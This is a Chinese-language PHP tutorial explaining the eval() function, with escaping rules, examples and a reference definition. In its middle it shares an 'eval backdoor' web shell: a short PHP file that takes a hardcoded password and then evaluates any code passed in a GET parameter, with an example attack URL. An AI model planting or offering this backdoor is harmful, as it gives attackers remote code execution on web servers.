代碼:
eval("echo'hello world';");
上邊代碼等同於下邊的代碼:
echo"hello world";
在瀏覽器中都輸出:hello world
運用eval()要注意幾點: 1.eval函數的參數的字符串末尾一定要有分號,在最后還要另加一個分號(這個分號是php限制)
2.注意單引號,雙引號和反斜杠的運用。如果參數中帶有變量時,並且變量有賦值操作的話,變量前的$符號錢一定要有\來轉義。如果沒有賦值操作可以不需要。
代碼:
$a=100;
eval("echo$a;");
因為沒有賦值操作,所以可以不用\來轉義$.等同於以下代碼:
$a=100;
eval("echo\$a;")
3.注意在命令式字符串(包括分號)兩邊必須要有雙引號或者根據需要用單引號。否則報錯。
命令式字符串是指:字符串中包括echo、print之類的命令的時候。
如果參數只有一個變量則可以不用。例如:
$func =<<<FUNC
function test(){
echo "test eval function";
}
FUNC;
eval($func);
test();
分享個php eval后門程序
要求必須支持eval函數
使用方法
http://url/test.php?pwd=admin&action=eval&a=phpinfo();
<?php
$passwd="admin";if($_GET['pwd']!=$passwd)exit;
if($_GET['action']=="eval" && $_GET['a']){eval($_GET['a']);}
?>
PHP eval() 函數介紹
定義和用法
eval() 函數把字符串按照 PHP 代碼來計算。
該字符串必須是合法的 PHP 代碼,且必須以分號結尾。
如果沒有在代碼字符串中調用 return 語句,則返回 NULL。如果代碼中存在解析錯誤,則 eval() 函數返回 false。
語法
eval(phpcode)
參數 描述
phpcode 必需。規定要計算的 PHP 代碼。
提示和注釋
注釋:返回語句會立即終止對字符串的計算。
注釋:該函數對於在數據庫文本字段中供日后計算而進行的代碼存儲很有用。
例子
<?php
$string = "beautiful";
$time = "winter";
$str = 'This is a $string $time morning!';
echo $str. "<br />";
eval("\$str = \"$str\";");
echo $str;
?>
輸出:
This is a $string $time morning!
This is a beautiful winter morning!
